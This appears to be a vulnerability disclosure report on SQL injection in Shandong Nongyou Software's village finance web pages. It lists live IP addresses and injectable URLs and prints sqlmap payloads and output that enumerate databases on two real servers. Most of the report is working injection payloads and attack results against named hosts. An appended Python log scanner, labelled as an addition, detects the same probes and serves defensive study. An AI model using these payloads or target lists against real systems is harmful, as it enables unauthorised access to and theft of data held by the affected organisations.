### Brief description:
RT (as in the title)
### Detailed description:
Shandong Nongyou Software official website: http://www.nongyou.com.cn/
All parameters: both tname and CountryName are injectable.
Examples:
http://218.56.99.84:8003/newSymSum/VillagePersonal2.aspx?tname=太河镇&CountryName=东同古村
http://222.135.109.70:8200/newSymSum/VillagePersonal2.aspx?tname=泽库镇&CountryName=辛立庄村
http://123.134.189.60:8022/newSymSum/VillagePersonal2.aspx?tname=牛泉镇&CountryName=西泉河
http://222.135.76.147:8200/newSymSum/VillagePersonal2.aspx?tname=斥山办事处&CountryName=西苏家村
http://218.58.124.131:8003/newSymSum/VillagePersonal2.aspx?tname=中央商务片区&CountryName=魏家社区
http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村
1. Tested injection point: http://218.56.40.229:8037/newSymSum/VillagePersonal2.aspx?tname=毕郭镇&CountryName=庙子夼村
[![1.png](https://images.seebug.org/upload/201412/31164230b7c29c9af24c38707734f299acb21c44.png)](https://images.seebug.org/upload/201412/31164230b7c29c9af24c38707734f299acb21c44.png)
```
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: tname
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tname=???' AND 3360=3360 AND 'AunX'='AunX&CountryName=????
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: tname=???' AND (SELECT 4079 FROM(SELECT COUNT(*),CONCAT(0x7175657371,(SELECT (CASE WHEN (4079=4079) THEN 1 ELSE 0 END)),0x716f676a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'MnDW'='MnDW&CountryName=????
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: tname=???'; SELECT SLEEP(5)-- &CountryName=????
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: tname=???' AND SLEEP(5) AND 'nhiY'='nhiY&CountryName=????
---
[16:41:05] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0
[16:41:05] [INFO] fetching database names
[16:41:35] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request
[16:41:43] [INFO] the SQL query used returns 5503 entries
[16:41:43] [INFO] retrieved: information_schema
[16:41:45] [INFO] retrieved: commoa
[16:41:46] [INFO] retrieved: commoa100001
[16:41:46] [INFO] retrieved: commoa100002
[16:41:47] [INFO] retrieved: commoa100003
[16:41:47] [INFO] retrieved: commoa100004
[16:41:48] [INFO] retrieved: commoa100005
[16:41:48] [INFO] retrieved: commoa100006
[16:41:48] [INFO] retrieved: commoa100007
[16:41:49] [INFO] retrieved: commoa100008
[16:41:49] [INFO] retrieved: commoa100009
[16:41:49] [INFO] retrieved: commoa100010
[16:41:50] [INFO] retrieved: commoa100011
[16:41:50] [INFO] retrieved: commoa100012
[16:41:51] [INFO] retrieved: commoa100013
[16:41:51] [INFO] retrieved: commoa100014
[16:41:51] [INFO] retrieved: commoa100015
[16:41:52] [INFO] retrieved: commoa100016
[16:41:52] [INFO] retrieved: commoa100017
[16:41:52] [INFO] retrieved: commoa100018
[16:41:53] [INFO] retrieved: commoa100019
[16:41:53] [INFO] retrieved: commoa100020
[16:41:55] [INFO] retrieved: commoa100021
[16:41:56] [INFO] retrieved: commoa100022
[16:41:56] [INFO] retrieved: commoa100023
[16:41:57] [INFO] retrieved: commoa100024
[16:41:57] [INFO] retrieved: commoa100025
[16:41:57] [INFO] retrieved: commoa100026
[16:41:58] [INFO] retrieved: commoa100027
[16:41:58] [INFO] retrieved: commoa100028
[16:41:59] [INFO] retrieved: commoa100029
[16:41:59] [INFO] retrieved: commoa100030
[16:41:59] [INFO] retrieved: commoa100031
[16:42:00] [INFO] retrieved: commoa100032
[16:42:00] [INFO] retrieved: commoa100033
[16:42:00] [INFO] retrieved: commoa100034
[16:42:01] [INFO] retrieved: commoa100035
[16:42:01] [INFO] retrieved: commoa100036
[16:42:02] [INFO] retrieved: commoa100037
[16:42:02] [INFO] retrieved: commoa100038
[16:42:02] [INFO] retrieved: commoa100039
[16:42:03] [INFO] retrieved: commoa100040
[16:42:03] [INFO] retrieved: commoa100041
[16:42:04] [INFO] retrieved: commoa100042
[16:42:04] [INFO] retrieved: commoa100043
[16:42:04] [INFO] retrieved: commoa100044
[16:42:05] [INFO] retrieved: commoa100045
[16:42:05] [INFO] retrieved: commoa100046
[16:42:07] [INFO] retrieved: commoa100047
[16:42:08] [INFO] retrieved: commoa100048
[16:42:08] [INFO] retrieved: commoa100049
[16:42:08] [INFO] retrieved: commoa100050
[16:42:09] [INFO] retrieved: commoa100051
[16:42:09] [INFO] retrieved: commoa100052
[16:42:10] [INFO] retrieved: commoa100053
[16:42:10] [INFO] retrieved: commoa100054
[16:42:12] [WARNING] user aborted during enumeration. sqlmap will display partial output
available databases [56]:
[*] commoa
[*] commoa100001
[*] commoa100002
[*] commoa100003
[*] commoa100004
[*] commoa100005
[*] commoa100006
[*] commoa100007
[*] commoa100008
[*] commoa100009
[*] commoa100010
[*] commoa100011
[*] commoa100012
[*] commoa100013
[*] commoa100014
[*] commoa100015
[*] commoa100016
[*] commoa100017
[*] commoa100018
[*] commoa100019
[*] commoa100020
[*] commoa100021
[*] commoa100022
[*] commoa100023
[*] commoa100024
[*] commoa100025
[*] commoa100026
[*] commoa100027
[*] commoa100028
[*] commoa100029
[*] commoa100030
[*] commoa100031
[*] commoa100032
[*] commoa100033
[*] commoa100034
[*] commoa100035
[*] commoa100036
[*] commoa100037
[*] commoa100038
[*] commoa100039
[*] commoa100040
[*] commoa100041
[*] commoa100042
[*] commoa100043
[*] commoa100044
[*] commoa100045
[*] commoa100046
[*] commoa100047
[*] commoa100048
[*] commoa100049
[*] commoa100050
[*] commoa100051
[*] commoa100052
[*] commoa100053
[*] commoa100054
[*] information_schema
```
Over 5000 tables; I did not dig any further.
I only tested this one; the others are all reproducible.
-------------------------------------------------------------------
Second injection:
http://218.58.124.131:8003/newSymSum/VillagePersonal3.aspx?tname=先进装备制造产业片区&CountryName=郭家村
http://222.135.76.147:8200/newSymSum/VillagePersonal3.aspx?tname=港西镇&CountryName=山后鞠家村
http://60.217.72.17:7081/newSymSum/VillagePersonal3.aspx?tname=新市镇&CountryName=王大褂村
http://222.135.109.70:8200/newSymSum/VillagePersonal3.aspx?tname=龙山办事处&CountryName=西楼
http://218.56.40.229:8053/newSymSum/VillagePersonal3.aspx?tname=城港路街道&CountryName=三间房
http://221.2.149.47:8200/newSymSum/VillagePersonal3.aspx?tname=滕家镇&CountryName=曹家沟
1. Tested injection point: http://218.58.124.131:8003/newSymSum/VillagePersonal3.aspx?tname=先进装备制造产业片区&CountryName=郭家村
[![2.png](https://images.seebug.org/upload/201412/311648048f13bed0fbf92ba0219b4027b4e41442.png)](https://images.seebug.org/upload/201412/311648048f13bed0fbf92ba0219b4027b4e41442.png)
```
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: tname
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: tname=??????????' AND 7785=7785 AND 'FAej'='FAej&CountryName=???
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: tname=??????????' AND (SELECT 8399 FROM(SELECT COUNT(*),CONCAT(0x7162797171,(SELECT (CASE WHEN (8399=8399) THEN 1 ELSE 0 END)),0x716f617271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Ovog'='Ovog&CountryName=???
Type: stacked queries
Title: MySQL < 5.0.12 stacked queries (heavy query)
Payload: tname=??????????'; SELECT BENCHMARK(5000000,MD5(0x72546e68))-- &CountryName=???
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: tname=??????????' AND 2926=BENCHMARK(5000000,MD5(0x71496377)) AND 'qbiT'='qbiT&CountryName=???
---
[16:47:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: MySQL 5.0
[16:47:55] [INFO] fetching database names
[16:47:55] [INFO] the SQL query used returns 17 entries
[16:47:55] [INFO] retrieved: information_schema
[16:47:55] [INFO] retrieved: cw_databasecomm0517
[16:47:55] [INFO] retrieved: cw_databasecomm22zbgaoxin
[16:47:55] [INFO] retrieved: cw_databasecommxh
[16:47:56] [INFO] retrieved: cw_databasezbgx
[16:47:56] [INFO] retrieved: cwdbcommzbgx100001
[16:47:56] [INFO] retrieved: cwdbcommzbgx100002
[16:47:56] [INFO] retrieved: cwdbcommzbgx100003
[16:47:56] [INFO] retrieved: cwdbcommzbgx100004
[16:47:56] [INFO] retrieved: cwdbcommzbgx100005
[16:47:56] [INFO] retrieved: cwdbcommzbgx100007
[16:47:56] [INFO] retrieved: mysql
[16:47:56] [INFO] retrieved: nl_zbgaoxin
[16:47:56] [INFO] retrieved: ny_landgxlz
[16:47:56] [INFO] retrieved: test
[16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxin
[16:47:56] [INFO] retrieved: village-levelmajor33zbgaoxinqu
available databases [17]:
[*] cw_databasecomm0517
[*] cw_databasecomm22zbgaoxin
[*] cw_databasecommxh
[*] cw_databasezbgx
[*] cwdbcommzbgx100001
[*] cwdbcommzbgx100002
[*] cwdbcommzbgx100003
[*] cwdbcommzbgx100004
[*] cwdbcommzbgx100005
[*] cwdbcommzbgx100007
[*] information_schema
[*] mysql
[*] nl_zbgaoxin
[*] ny_landgxlz
[*] test
[*] village-levelmajor33zbgaoxin
[*] village-levelmajor33zbgaoxinqu
```
All of the above are reproducible.
### Proof of vulnerability:
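As an added example (not part of the original report), the following Python checker scans IIS W3C log lines for the four payload families sqlmap reported against VillagePersonal2.aspx and VillagePersonal3.aspx (boolean-based blind, error-based, stacked queries, time-based blind) in the tname and CountryName parameters, so a defender can spot the same probes in their own logs. The log field order and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Added example, not from the report: signatures for the four sqlmap techniques
# the report lists, matched against the decoded tname / CountryName values.
SIGNATURES = {
    "boolean-blind": re.compile(r"'\s*AND\s+(\d+)=\1\s+AND\s+'", re.I),
    "error-based": re.compile(r"INFORMATION_SCHEMA\.CHARACTER_SETS|FLOOR\(RAND\(0\)\*2\)", re.I),
    "stacked-queries": re.compile(r"'\s*;\s*SELECT\s+(SLEEP|BENCHMARK)\s*\(", re.I),
    "time-blind": re.compile(r"\bAND\s+(\d+=)?(SLEEP|BENCHMARK)\s*\(", re.I),
}
WATCHED_PARAMS = {"tname", "CountryName"}

def classify_query(raw_query):
    """Decode an IIS cs-uri-query field; return the techniques matched in watched params."""
    hits = set()
    for name, values in parse_qs(raw_query, keep_blank_values=True).items():
        if name in WATCHED_PARAMS:
            for value in values:
                hits.update(t for t, p in SIGNATURES.items() if p.search(value))
    return sorted(hits)

def scan_iis_log(lines):
    """Return (c-ip, cs-uri-stem, techniques) for every request whose query matches.

    Assumed field order (a constructed subset of the IIS W3C defaults):
    date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
    """
    alerts = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue  # skip W3C directive lines and blanks
        f = line.split()
        techniques = classify_query(f[5])
        if techniques:
            alerts.append((f[8], f[4], techniques))
    return alerts

# Constructed sample log: one legitimate village lookup, then three sqlmap-style probes.
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2014-12-31 08:41:00 10.0.0.5 GET /newSymSum/VillagePersonal2.aspx tname=%E6%AF%95%E9%83%AD%E9%95%87&CountryName=%E5%BA%99%E5%AD%90%E5%A4%BC%E6%9D%91 8037 - 203.0.113.7 Mozilla/5.0 200
2014-12-31 08:41:05 10.0.0.5 GET /newSymSum/VillagePersonal2.aspx tname=%E6%AF%95%E9%83%AD%E9%95%87%27%20AND%203360%3D3360%20AND%20%27AunX%27%3D%27AunX&CountryName=x 8037 - 203.0.113.7 sqlmap/1.0 200
2014-12-31 08:41:09 10.0.0.5 GET /newSymSum/VillagePersonal2.aspx tname=%E6%AF%95%E9%83%AD%E9%95%87%27%20AND%20SLEEP(5)%20AND%20%27nhiY%27%3D%27nhiY&CountryName=x 8037 - 203.0.113.7 sqlmap/1.0 200
2014-12-31 08:47:55 10.0.0.6 GET /newSymSum/VillagePersonal3.aspx tname=x%27%3B%20SELECT%20BENCHMARK(5000000%2CMD5(0x72546e68))--%20&CountryName=x 8003 - 203.0.113.9 sqlmap/1.0 200
""".splitlines()

if __name__ == "__main__":
    for ip, page, kinds in scan_iis_log(SAMPLE_LOG):
        print(f"{ip} -> {page}: {', '.join(kinds)}")
```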